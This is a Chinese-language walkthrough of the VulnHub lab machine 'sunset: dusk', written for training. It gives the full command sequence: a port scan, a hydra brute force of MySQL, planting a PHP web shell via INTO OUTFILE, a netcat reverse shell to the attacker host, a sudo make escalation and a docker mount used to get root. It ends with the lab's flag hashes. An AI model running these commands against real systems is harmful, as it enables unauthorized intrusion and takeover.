PJzhang:vulnhub靶機sunset系列SUNSET:DUSK

貓寧~~~

 

地址：https://www.vulnhub.com/entry/sunset-dusk,404/

重點關注工具和思路。

nmap 192.168.43.0/24

靶機IP
192.168.43.200

21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
80/tcp open http
3306/tcp open mysql
8080/tcp open http-proxy

nmap -A -p1-65535 192.168.43.200，關注各個系統服務的版本漏洞

訪問http://192.168.43.200:8080/，http://192.168.43.200/

成功，賬戶密碼root/password
hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.43.200 mysql

進入數據庫
mysql -h 192.168.43.200 -u root -P 3306 -p

select "<?php system($_GET['cmd']); ?>" into outfile '/var/tmp/muma.php' ;

http://192.168.43.200:8080/中可以看到muma.php，所在目錄是/var/tmp

http://192.168.43.200:8080/muma.php?cmd=id

http://192.168.43.200:8080/raj.php?cmd=nc%20-e%20/bin/bash%20192.168.43.154%204444

nc -e /bin/bash 192.168.43.154 4444

攻擊機nc -lvnp 4444

獲得shell
python -c 'import pty;pty.spawn("/bin/bash")'

sudo -l
(dusk) NOPASSWD: /usr/bin/ping, /usr/bin/make, /usr/bin/sl
提權到dusk用戶
sudo -u dusk make --eval=$'x:\n\t'/bin/bash

家目錄
cat user.txt
08ebacf8f4e43f05b8b8b372df24235b

docker images
docker pull alpine
docker run -v /:/mnt -it alpine
獲取了root權限

cd /mnt/root
cat root.txt
8930fa079a510ee880fe047d40dc613e